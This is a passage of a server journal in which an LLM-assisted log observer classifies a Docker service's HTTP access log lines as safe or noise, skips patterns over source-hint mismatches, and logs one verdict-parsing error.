Source hint mismatch: LLM says "docker container web/api access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:18.621945 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:27:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:18.621985 [analyzer] Source hint mismatch: LLM says "docker/captain (application HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:21.710605 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:27:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:21.710641 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:24.556946 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:27:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:24.556979 [analyzer] Source hint mismatch: LLM says "docker-captain (web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:25.808326 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:27:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:25.808363 [analyzer] Source hint mismatch: LLM says "docker container access logger / API gateway", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:27.773151 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=regex Mar 19 22:27:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:27.773219 [analyzer] Source hint mismatch: LLM says "docker (captain web/API container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:30.877353 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix 
Mar 19 22:27:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:30.877411 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:33.652137 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:27:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:33.652200 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:36.160748 [observer] Pipeline: processed=146 pattern_hits=78 llm_calls=67 llm_errors=1 learned=0 Mar 19 22:27:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:36.160790 [observer] Patterns: hash=78 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=68 Mar 19 22:27:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:36.581267 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:27:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:36.581301 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:39.711397 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:27:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:39.711435 [analyzer] Source hint mismatch: LLM says "docker/captain-captain container web service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:42 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:42.779625 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:27:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:42.779662 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:45.769688 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:27:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:45.769721 [analyzer] Source hint mismatch: LLM says "docker access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:48.908904 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:27:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:48.908960 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:51.829857 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:27:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:51.829898 [analyzer] Source hint mismatch: LLM says "docker container access log / API gateway", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:54.728051 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:27:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:54.728104 [analyzer] Source hint mismatch: LLM says "dockerized web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:57.759211 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:27:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:57.759249 [analyzer] Source hint mismatch: LLM says "docker container access log / app web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:00.926861 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:28:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:00.926894 [analyzer] Source hint mismatch: LLM says "docker/captain container web service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:03.837150 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:28:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:03.837213 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:06.160469 [observer] Pipeline: processed=168 pattern_hits=90 llm_calls=77 llm_errors=1 learned=0 Mar 19 22:28:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 
22:28:06.160581 [observer] Patterns: hash=90 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=78 Mar 19 22:28:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:06.720556 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:28:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:06.720659 [analyzer] Source hint mismatch: LLM says "docker HTTP access log (app endpoint)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:09.555055 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:28:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:09.555093 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:12.668520 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:28:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:12.668553 [analyzer] Source hint mismatch: LLM says "docker container web/API access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:15.811079 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:28:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:15.811121 [analyzer] Source hint mismatch: LLM says "docker/captain web service access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:18 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:18.650114 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:28:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:18.650154 [analyzer] Source hint mismatch: LLM says "docker (captain-captain app HTTP access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:21.693281 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:28:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:21.693314 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:24.717508 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:28:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:24.717546 [analyzer] Source hint mismatch: LLM says "docker container access logs (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:25.708888 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:28:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:25.708926 [analyzer] Source hint mismatch: LLM says "docker container web API (app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:27.839449 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: 
classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:28:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:27.839483 [analyzer] Source hint mismatch: LLM says "docker (captain-captain) reverse proxy / app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:30.553049 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:28:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:30.553084 [analyzer] Source hint mismatch: LLM says "docker container access log (API gateway/app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:33.728267 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:28:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:33.728302 [analyzer] Source hint mismatch: LLM says "docker/captain web access log (app container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:36.159943 [observer] Pipeline: processed=194 pattern_hits=105 llm_calls=88 llm_errors=1 learned=0 Mar 19 22:28:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:36.159967 [observer] Patterns: hash=105 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=89 Mar 19 22:28:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:36.740062 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:28:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:36.740097 [analyzer] Source hint mismatch: LLM says "docker/HTTP app access log 
(containerized service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:40.059087 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=contains Mar 19 22:28:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:40.059124 [analyzer] Source hint mismatch: LLM says "docker container access log / web server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:42.913201 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:28:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:42.913244 [analyzer] Source hint mismatch: LLM says "docker container web/API access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:45.751002 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:28:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:45.751058 [analyzer] Source hint mismatch: LLM says "docker/captain (web app/API inside container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:48.761658 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:28:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:48.761694 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container access log / reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — 
skipping pattern Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:51.909491 [llm] Failed to parse verdict from: { Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "classification": "safe", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "confidence": 0.72, Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "reason": "Routine HTTP GET request to an API endpoint with a 304 response and latency logging; appears to be normal application access.", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "action": "allow", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "pattern_type": "regex", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "pattern": "^GET /api/v2/user/apps/appData/api/logs\\?encoding=hex \\d+ $", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "source_hint": "docker (containerized web/app access log)", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "variable_fields": [ Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: { Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "token": "GET /api/v2/user/apps/appData/api/logs?encoding=hex 304", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "type": "request_id", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: }, Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: { Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "token": "20.889 ms", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "type": "duration", Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: } Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: ] Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: } Mar 19 22:28:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:51.909532 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal Mar 19 22:28:51 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:28:51.909542 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:28:50.599272672Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:28:55 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:55.118723 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:28:55 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:55.118760 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:28:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:57.945244 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:28:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:28:57.945279 [analyzer] Source hint mismatch: LLM says "dockerized web API (likely application access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:00.713094 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:29:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:00.713144 [analyzer] Source hint mismatch: LLM says "docker container (web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:03.734274 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:29:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:03.734312 [analyzer] Source hint mismatch: LLM says "docker container running an API service (captain-captain)", 
actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:06.159974 [observer] Pipeline: processed=216 pattern_hits=117 llm_calls=98 llm_errors=2 learned=0 Mar 19 22:29:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:06.159999 [observer] Patterns: hash=117 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=99 Mar 19 22:29:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:06.705895 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:29:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:06.705929 [analyzer] Source hint mismatch: LLM says "docker/captain web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:09.979720 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:29:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:09.979756 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app server (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:12.589505 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:29:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:12.589539 [analyzer] Source hint mismatch: LLM says "docker (container web access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:16.211249 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: 
classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:29:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:16.211290 [analyzer] Source hint mismatch: LLM says "docker/HTTP app (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:18.878469 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:29:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:18.878503 [analyzer] Source hint mismatch: LLM says "docker web/app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:21.865631 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:29:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:21.865665 [analyzer] Source hint mismatch: LLM says "docker container access log (application HTTP server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:24.865132 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:29:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:24.865186 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (app web server access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:26.443916 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains Mar 19 22:29:26 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:29:26.443954 [analyzer] Source hint mismatch: LLM says "docker (captain web/API container access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:28.033281 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=regex Mar 19 22:29:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:28.033319 [analyzer] Source hint mismatch: LLM says "docker/captain web/API access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:30.781473 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:29:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:30.781509 [analyzer] Source hint mismatch: LLM says "docker container web app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:33.729637 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:29:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:33.729674 [analyzer] Source hint mismatch: LLM says "docker (application web server access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:36.161135 [observer] Pipeline: processed=242 pattern_hits=132 llm_calls=109 llm_errors=2 learned=0 Mar 19 22:29:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:36.161177 [observer] Patterns: hash=132 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=110 Mar 19 22:29:36 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:29:36.756065 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:29:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:36.756104 [analyzer] Source hint mismatch: LLM says "docker/captain (web API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:39.885972 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:29:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:39.886010 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:42.732342 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:29:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:42.732379 [analyzer] Source hint mismatch: LLM says "docker container access logs (web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:45.626940 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:29:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:45.626976 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / application HTTP access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:29:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:48.687295 [analyzer] LLM verdict for 
